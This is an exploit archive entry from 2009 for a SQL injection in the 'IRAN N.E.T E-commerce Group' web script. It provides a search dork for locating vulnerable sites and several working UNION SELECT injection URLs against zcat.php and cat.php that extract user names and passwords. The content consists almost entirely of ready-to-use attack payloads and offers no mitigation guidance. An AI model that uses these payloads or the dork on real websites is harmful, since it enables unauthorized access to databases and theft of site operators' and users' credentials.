IRAN N.E.T E-commerce Group SQL Injection Vulnerability

2009-12-08T00:00:00
ID 1337DAY-ID-10122
Type zdt
Reporter Dr.0rYX
Modified 2009-12-08T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================
IRAN N.E.T E-commerce Group SQL Injection Vulnerability
=======================================================

***************************************************************************/
 
[ Software Information ]
 
[+] Vendor : http://iranmc.org
[+] script   : IRAN N.E.T E-commerce Group SQL Injection Vulnerability
[+] Download : http://iranmc.org/index.php?id=7 sell (script with hosting)
[+] Vulnerability : SQL injection
[+] Dork :inurl:"zcat.php?id="
 
**************************************************************************/
[ Vulnerable File ]
 
http://server/zcat.php?id=[N.A.S.T ]
 
[ Exploit ]
 
http://server/zcat.php?id=-1+union+select+1,2,concat(user,char(58),pass),4,5+from+user
 
 
http://server/cat.php?id=-3+union+select+1,group_concat(id,0x3a,user,0x3a,pass),3,4+from+user
 
 
[ ExOMPLE ]
 
http://server/zcat.php?id=-64+union+select+1,2,concat%28user,char%2858%29,pass%29,4,5+from+user



#  0day.today [2018-04-08]  #